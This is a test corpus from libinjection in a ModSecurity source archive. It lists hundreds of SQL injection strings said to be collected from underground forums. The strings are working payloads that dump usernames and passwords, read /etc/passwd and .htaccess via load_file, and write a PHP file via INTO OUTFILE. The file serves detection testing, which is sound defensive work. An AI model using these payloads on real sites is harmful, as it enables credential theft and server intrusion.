bar where select (@version),(2),3 from bar where select ((@version)),(2),3 from bar where select (((@version))),(2),3 from bar where select (id),(2),3 from bar where select ((id)),(2),3 from bar where select (((id))),(2),3 from bar where select (@version),(2),3 from bar where select (((((1,2,3,4)))) from bar modsecurity-v3.0.4/others/libinjection/data/sqli-forums.txt0000755000175000017500000522005513607066311024434 0ustar zimmerlezimmerle# This file contains SQL injection samples collected from # Russian underground forums targetting real web sites. # # Collected by Miroslav Stampar (@stamparm). # # References: # # [1] http://forum.antichat.ru/printthread.php?t=21336 # [2] http://forum.xakep.ru/m_1757275/tm.htm # [3] https://rdot.org/forum/archive/index.php/t-5.html # -00000000000000000000000000000000000000000000000030' union select 1,group_concat(table_name),3 from information_schema.tables group by table_schema -- 0000000012 UNION SELECT 1,2,3 LIMIT 1,1/* -0000000046 union select 1,2,3,4,5,6,concat(username,char(58),password),8,9,10,11,12,13,14,15 from _user-- -0000000063 union select 1,2,3,4,group_concat(username,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from step_users 0000000065777 union select 1,2,3,4,concat(user,char(59),password),6,7,8,9,10,11,concat(USER(),char(59),VERSION(),char(59),DATABASE()),13 from mysql.user/* -00000000 UNION SELECT 1,2,3,4,5,concat(version(),database(),user()),7,8,9-- 0000000166 UNION SELECT 1,2,3,4,CONCAT_WS(0x3a,version(),user(),database()),6,7,8,9,10 LIMIT 1,1 -000000017' union select 1,2,3,4,concat_ws(0x3a3a,user_email,user_pw),6,7 from Users limit 1,1 -- -0000000185 union select 1,2,3,4,5,6,group_concat(table_name separator 0x3a),8,9,10,11,12,13,14,15 from information_schema.tables-- 00000002202 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=0x623132333035-- 00000002202 union select 1,2,3,version(),5,6,7,8,9-- 0000000347 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(USER(),VERSION(),DATABASE()),8,9,10,11,12,13,14,15 -- 00000017|%25' union select 1,2,version(),4/* 000000283 and 1=0 union select 1,concat_ws(0x3a,User,Password),3,4 from mysql.user-- -00000321 union select 1,2 /* -000006 union select 1,2,3,convert(concat_ws(0x3a,version(),database(),user()) using latin1),5,6,7,8,9,10 -00000858 union select concat_ws(0x0b,user(),database(),version()),2 -00001 union select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os) 000035 union select 1,name FROM users/* -0000 union select concat(version(),user(),database()),2,3,4,5,6,7 from information_schema.tables-- -00012 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -00014722 union select 1,2,3,4,5,0x35372720756e696f6e2073656c656374203120696e746f206f757466696c65202f7661722f7777772f6874646f63732f616e7469636861742e72752f746573742e70687027202d2d20,7,8,9,10,11,12,13,14,15,16,17,18 from mysql.user 000-1 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3/* -000427 union select 1,2,database(),4,version(),6,7-- -000456 union select 1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,8,9,10,11,12/* -00058' union select 1,2,3,4,concat_ws(0x3a3a,login,senha),6 from login -- 00062 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5 limit 1,1 -00076 union select 1,2,3,concat_ws(0x3a3a,name,password) from users -- -000963 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- 0009 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8-- 000 union select 1,2,3,4,table_name,6 from information_schema.tables limit 38,1/* 000 union select 1,2,concat(username,char(58),password),4,5,6,7,8,9,0,1,2,3,4 from user_profile limit 0,1/* -00121 union select user(),2-- -001 union select 1,2,3,4,5,version(),7,8,9,10 -00239 union select 1,2,3,4,5,6,table_name,concat_ws(0x3a,version(),user(),database()),9,0,11,12,13,14,15 from information_schema.tables-- -005319 UNION SELECT 0,1,2,3,4,concat_ws(0x0b,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16 -- 007 or 1 group by concat((select host from mysql.user WHERE User=0x726F6F74),floor(rand(0)*2)) having min(0)-- 009649 and 1=0 UNION SELECT 1,2,version(),4,5,6,7,8,9 -- 00 union select 1,2,concat(username,0x3a,password),4,5 from admin/* 00 union select 1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6 from information_schema.tables limit 31,1/* -01015 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17-- 0101' and 1=0 UNION SELECT 1,2,3,4,5,6,version(),8,9,10 -- -0101 union select concat(username,0x3a,password) from edu.user limit 1,1/* -0102' union select 1,concat_ws(0x3a3a,version(),user(),database()) -- -01.075 UNION SELECT 0,1,2,3,concat_ws(0x0b,user(),database(),version()),5,6 -0127 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6 -- 0137986542 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19,20,21,22,23,24-- -0148 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -019 union select char(1),concat_ws(0x3a,user(),version(),database()),null,null,null/* 01' and 0=1 union select 1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6-- 01' and 0=1 union select 1,2,3,group_concat(concat_ws(0x3a,id,email,pass,level,0x3a3a3a)),5,6 from members_login where level<>1-- -01 union select 1,concat(nickname,char(58),email,char(58),passwd),3 from forum_users/* -0202 union select concat_ws(0x3a3a,login,password,gid) from mega_user where login=0x61646D696E -- -021324 union select 1,2,3,4,concat(name,0x3a,email,0x3a,passwd),6,7,8,9,0,1,2 from users/* 02 and 1=0 union select 1,group_concat(username,char(58),password),3,4,5,6,7 from admin_usuarios -0303 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 0306076 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60/* -0306076 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60-- 0_3 union select 1,2,3,4,5,6,7,8,9,10/* 080049101' or(1=(select(max(table_name))from -0805071659225' union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7 -- -08 UNION SELECT 1,2,3,4,5,6,DATABASE(),8,9,10/* 0980984809809 union select 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),4,5,6-- 09814' union select 1,concat_ws(0x3a,lgn,psw,status),3,4,5 from users limit 0,1/* 0 and 1=0 union select 1,2,3,4,5,6-- 0 and 1=0 union select 1,2,3,concat_ws(0x3a,user(),version(),database())/* 0 and 1=0 union select concat(user,char(58),password),2,4,5,6,7,8,9,0,0,0 from mysql.user limit 1,1/* 0 anD 1=2 union all select 1,2,3,4,version(),6,7/* 0 and 1=2 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6 -- 0 or 1 group by concat(version(),floor(rand(0)*2))having min(0) -- 0;select cast(version()||chr(32)||current_database()||chr(32)||user as int) 0 union all select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15-- 0 union all select 1,2,version(),4,6,concat_ws(0x3a,table_name) from information_schema.tables limit 28,1-- 0 union all select 1,CONCAT_WS(0x203a20,user(),database(),version()),3,CONCAT_WS(0x203a20,user,password),5 from mysql.user/* 0 union all select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os) 0 UNION SELECT 0,1,2,3,4,UNHEX(HEX(concat_ws(0x0b,user(),version(),database()))),6,7,8,9 0 union select 0,1,2 from 0 union select 1 -- 0 union select 1,2,3,4,5,6 -- 0 union select 1,2,3,4,5,6,7,8,9,0-- 0' union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,passw),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from USERS/* 0 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),8,9,0-- 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- 0' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 0' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),database(),user()),23,24,25,26,27,28/* 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(version(),0x3a,user(),0x3a,database()),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/* 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a3a3a,user,0x3b,password),16,17,load_file(0x2f6574632f706173737764),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from mysql.user-- 0 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13,14,15 0 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13-- 0' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,_login_xz,_pass_xz),10 from _system_user/* -0 union select 1,2,3,4,5,6,concat_ws(version(),database(),user()),8-- 0' union select 1,2,3,4,5,6,unhex(hex(user())),8,9,10,11,12,13 -- -0 union select 1,2,3,4,5,concat_ws(0x3a,name,email) from users-- 0 union select 1,2,3,4,5,unhex(hex(@@version)),7,8,9,10,11-- 0')union(select(1),(2),3,4,concat_ws(0x3a,user,pass),6,7,8 from userlist limit 0,1)-- 0 union select 1,2,3,4,version(),6,7,8 -- 0' UNION SELECT 1,2,3,4,version(),6,7,8,9,10/* 0 union select 1,2,3,column_name from information_schema.columns/* 0 union Select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,0,11-- 0 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- 0' UNION SELECT 1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14 FROM users/* -0' union select 1,2,concat_ws(0x3a,table_name,column_name),4 from information_schema.columns/* -0 'union select 1,2,concat_ws(0x3a,username,user_password,user_icq,user_email),4 from phpbb.phpbb_users/* 0 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5-- 0 union select 1,2,concat_ws(char(58),user,char(32),pass),4,5 from auth-- 0 union select 1,2,login,4,passwd,6 from account limit 0,1/* -0 union select 1,2,version(),4,5,6,7,8 /* 0 union select 1,concat(id,char(58),nick,char(58),pass),3,4,5 from jp_admins limit 0,2/* 0 union select 1,concat(username,0x3a,password),3 from admin/* 0' union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5 -- 0 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 0 union select 1,concat_ws(0x3,version(),user(),database()),3/* 0 union select 1 from user/* 0 union select 1,group_concat(table_name,0x3b),3,4,5 from information_schema.tables where table_schema=database() -- 0' union select 1,load_file('/lala'),3,4,5,6,7,8,9,10,11,12,13,14,15/* -0 union select 1,uid,3,4,5,6,7 from usuario -- 0 union select 1,version(),3,4,5,6,7,8-- (0)union(select(1),version(),3,4,5,6,7,8,9)-- -0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 0 union select 91,92,93,94,95,user(),97,version(),database(),910,911,912 -- 0 union select aes_decrypt(aes_encrypt(concat_ws(0x203a20,version(),user(),database()),324),324)/* 0 union select concat(0x2a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15 limit 1,1 0 union select concat(user,0x3a,password),2,3 from mysql.user/* -0 union select concat(user_name,0x3a,password) FROM user/* 0 UNION SELECT concat_ws(0x3a,USERID,USERNAME,password),2,3,database(),user(),5,6,7,8,9,10,11 FROM USERS -- 0 UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()) -0 union select concat_ws(char(58,58),user(),database(),version())-- 0 UNION SELECT group_concat(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS-- 0 UNION SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES -- 0'union(select(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x))-- 0) union select table_name,2 from information_schema.tables/* 0 UNION SELECT T.B FROM (SELECT ROWNUM R, BANNER B FROM V$VERSION) T WHERE R=1 -- 0x27 union select 1,LOAD_FILE(0x2f6574632f706173737764),LOAD_FILE(0x2f6574632f706173737764),4,5,6,7,8,9 from news/* 0x2d3127 union select 1,2,3/* 0x2d3127 union select 1,2,3,4,5/* 0x2d3127 union select 1,2,3,4,5,6,7,8,9,10/* 0x2d3127 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 0x2d3127 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* 0x2d3127 union select 1,2,3,4,5,6,7,8,concat_ws(0x2F,version(),database(),user())/* 0x2d3127 union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 0x2d3127) union select 1,2,concat_ws(0x2F,version(),database(),user())/* 0x2d3127 union select 1,concat_ws(0x2F,version(),database(),user())/* 0x2d33313731303427 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* 0x3127 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15/* 0x3127 union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 0x3127 union select 1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10/* 0x3127 union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/* 0x3127 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/* 0x3127 union select 1,2,concat_ws(0x2F,version(),database(),user())/* 0x3127 union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/* 0x3127 union select 1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 0x3127 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14/* 0x3127 union select 1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* 0x3127 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6/* 0x3127 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 0x3127 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/* 0x3127 union select concat_ws(0x2F,version(),database(),user())/* 0x31323332333827 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 0x313527 union select 1,2,3,4,concat_ws(0x2F,version(),database(),user()),6/* 0x313733373327 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10/* 0x3137353427 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13/* 0x313827 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18/* 0x3235 union select concat(version(),0x3a,user(),0x3a,database())/* 0x3327 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/* 0x343027 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13/* 0x35333927 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9/* 0x3627 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8/* 0x363227 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19/* 0x36383327 union select 1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* 0x36383327 UNION SELECT 1,2,username,4,5,6,7,8,9,user_password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from phpbb_users limit 1,1/* 0x3727 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6/* 0x393227 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* 100000000 union select 1,concat_ws(0x3a,database(),user(),version()),3,4 1000000 union select 1,2,concat_ws(0x3a,database(),version(),user())/* -100005 UnIon selECt 1,2,3,4,5,6,7,8,version(),10,11,12-- -100005 union select concat_ws(0x3a,user(),database())/* -100007 union select 1,concat_ws(0x3a,table_name),version(),4,5,6,7 from information_schema.tables limit 17,1/* -100009 union select concat_ws(0x3a,login,password) from avg_admin/* -100012860 union select 1,2,3,4,5,concat_ws(0x3a3a,cid,clogin,cpass,corg,ctype),7,8,9,10,11,12,13,14,15,16,17,18,19,20 from impulse_users where ctype=0 -- -100015 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x62656172732d636c7562 -- 10001 and 1=0 union select 1,@@version,3,4-- -10001 union select 1,2,3,4,5,6,user(),8,9,10,11,12,13 -- -100022 union select version()-- 100024 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from information_schema.tables -- -100038 union select 1,2,concat_ws(0x3a,user(),version(),database()),4/* 100043 and 2=1 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13 from information_schema.tables 10007200 and 10007200=-10007200 union select 1,2,3,4,5,null,user(),8,9,10,database(),version(),13,14,15,null,17,18,19,20,21,22,null,null,25,null/* -100081 union select concat_ws(0x3a,version(),user(),database()) -10008 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,table_name,20,21 from information_schema.tables limit 47,1/* 1000' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17 from admin/* 1000 union select 1,2,3,version(),user(),6/* 1000 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8/* -1000 union select concat(name,0x3a,password) from users/* 1000 union select version()1,2,3,4/* -100155 and 1=2 union all select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,name,password,email),0x71),0x71),5,6,7,8,9,10,11,12,13,14 from adkaudit_admin limit 1 offset 0-- 1001 and 1=2 union select 1,2,3,unhex(hex(group_concat(login,0x3a,password))),5 from admin-- -10029 union select 1,concat_ws(0x3a,user(),version(),database()),3,4 -- -100301 union select 1,concat_ws(0x3a,name,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from sibkray_site.ibf_members-- -1003090020 union select 1,group_concat(0x0b,NickName,0x3a,PassWd,0x3a,ICQ),3,4,5,6,7,8,9,10,11,12 from fusers-- -100343' union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/* -1003 union select 1,aes_decrypt(aes_encrypt(load_file('/etc/passwd'),1),1),3,4,5,6 -1003 union select 1,version(),3,4,5,6,7,8,9,user(),1,2,3,4,5,6,7,8/* -1003 union select table_name,2 from information_schema.tables limit 1,1-- -10042 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,16,18,19,20,21,22,23,24 -100500 UnIon selECt 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 -- 100500 union select concat(username,0x3a,password) from jos_users/* 100500 UNION SELECT CONCAT(USERNAME,0x3a,PASSWORD) FROM jos_users LIMIT 1/* 10050 union select 1,2,3,4,5,6,concat(editor_userneme,0x3a,editor_pwd) from editors/* 10066' and 1=0 UnIon -1006 union select AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5 from mysql.user/* 100708769' and 0 union select 1,2,3,LOAD_FILE('/var/www/html/admin/.htaccess'),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85-- 10077 AND ASCII(SUBSTRING((select y=1...3()),1,1)>x -1008005 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 -1008 union select 1,2,3,4,5,6,concat(COLUMN_NAME,0x2,TABLE_NAME),8,9,10,11,12,13,14,15,16,17 from INFORMATION_SCHEMA.COLUMNS limit 17,1-- -100964 union select 1,2,3,4,group_concat(0x0b,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_name=0x70687062625F7573657273-- 100-99.9 UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11-- 100 and 1=0 union select 1,2,3,4,5,group_concat(userName,char(58),Password),7,8,9,10,11 from admin 100 and 1=0 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5-- 100) and 1=1/* 100 and 1=2 union select 1,2,3,4,5,6,group_concat(concat_ws(0x3a,column_name)),8 from information_schema.columns where table_name=0x62625f7573657273 -- 100 union select 1 -- -100 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from mysql.user -- -100' UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -100 union select 1,2,3,4,5,6,7,8,9,10,group_concat(id,txn_id,payment_amount,payment_currency,item_name,receiver_email,payer_email) from purchases 100 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a20203a,version(),user(),database())-- -100 UNION SELECT 1,2,3,4,5,6,convert(user() using latin1),8,9,10,11,12,13,14,15,16,17,18,19/* 100 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13 from information_schema.`tables` where table_schema=database() -100 union select 1,2,3,4,concat_ws(0x207c7c20,version(),user(),database()),6-- -100 union select 1,2,3,4,concat_ws(version(),0x2d,database(),0x2d,user()),6,7,8,9 -100 union select 1,2,3,4,group_concat(TABLE_NAME),6,7,8,9 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,10 -- -100 union select 1,2,3,concat_ws(0x3a,version(),database(),user()) -- -100 union select 1,2,3,unhex(hex(group_concat(0x3a,member_id,0x3a,username,0x3a,password,0x3a,email))),5,6,7,8,9 from members-- -100 union select 1,2,3,@@version,5,6,7,8,9,10,11 -- -100 union select 1,2,concat(user,0x3a,password),4 from mysql.user/* 100 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5 -- -100 union select 1,2,username,4,5 from phpbb_users where user_id=2/* -100 union select 1,convert(concat(user(),0x3A,version(),0x3A,database()),binary),3,4,5,6,7,8,9,10,11,12 -- -100 union select 1,group_concat(0x0b,id,0x3a,user_name,0x3a,password),3,4,5,6,7,8,9,10,11,12 from admin -- -100 union select 1,group_concat(username,char(58),password),3,4,5 from admin -- 100 union select 1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -100 union select 1,version(),database(),4,5,6,7/* 100' UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7/* 100) union select char(0x61,0x6e,0x74,0x69,0x63,0x68,0x61,0x74)/* -100 union select concat_ws(0x203a20,version(),user())-- -100 union select concat_ws(0x3a,version(),user()),2,concat_ws(0x3a,host,user,password,file_priv),4 from mysql.user -1010007 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 10104' and (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from news group by 2 limit 1)a)-- -101101 union select 1,2,3,4,5,6,7,concat(uname,char(58),sname,char(58),nick,char(58),email,char(58),password),9,10,11,12,13,14 from artekovtsi limit 7,1/* -1011339 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19 from mysql.user-- -1011 union select 1,2,3,group_concat(0x3c62723e,concat_ws(0x203a3a3a20,unhex(hex(username)),unhex(hex(password)),unhex(hex(email)))),5,6,7,8,9,10 from jos_users -- -1012 union select table_name,2,3 from information_schema.tables -- 101356 and 1=1 union select 1,2,3,count(pw),5,6,7,8,9,10,11,12,13,14,15,161,71,8,19 from clientsDBServer: MSAccessResp.Time(avg): 910msWebRoot: c:\windows\system32\inetsrv\ -101462' union select concat_ws(0x3A3a,id,username,password,created,lastlogin,level) from probid_admins/* -1014' UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13 # -1014 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables-- -1014 union select 1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4 from information_schema.columns where column_name like 0x257061737325 limit 0,1/* -1014 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 101500900-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 1015 and 0 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,pass),11,12,13,14 from alex_livre_users_en limit 0,1 -- -1015 union select 1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- 10168768754384 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,1,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -1016 union select 1,2,3,table_name,5,6,7,8,9,10,11,12 from information_schema.tables -- -1018 union select 1,version(),3,4,5,6,7,8,9,10/* -101 and 1=0 union select 1,2,concat(nomutilisateur,0x3a,motpasse),4 from utilisateur-- 101' and 1=0 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3 -- -101 and 1=2 union select 1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6 -- 101 and 1=2 union select version() # -101 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,version(),database(),user()),18,19,20,21,22,23,24,25,26,27,28,29 -101 union select 1,2,3,4,5,6,7,8 from admin/* 1-0.1 UNION SELECT 1,2,3,4,5,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -101 union select 1,2,3,4,5,concat(version(),0x20,database(),0x20,user()),7,8,9-- -101 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 1-0.1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),6,7,8,9-- 101 UNION SELECT 1,2,concat(mx_username,0x3a,mx_password),4,5,6,7 FROM mxmaster_mxmasterdb.mx_admin LIMIT 1,2/* -101 union select 1,2,version(),table_name,5 from information_schema.tables-- 1-0.1 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11-- 101 union select 1,concat_ws(0x3a,database(),user(),version())/* -101 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11 -101 union select 1,group_concat(table_name),3,4,5 from information_schema.tables -- -101 union select 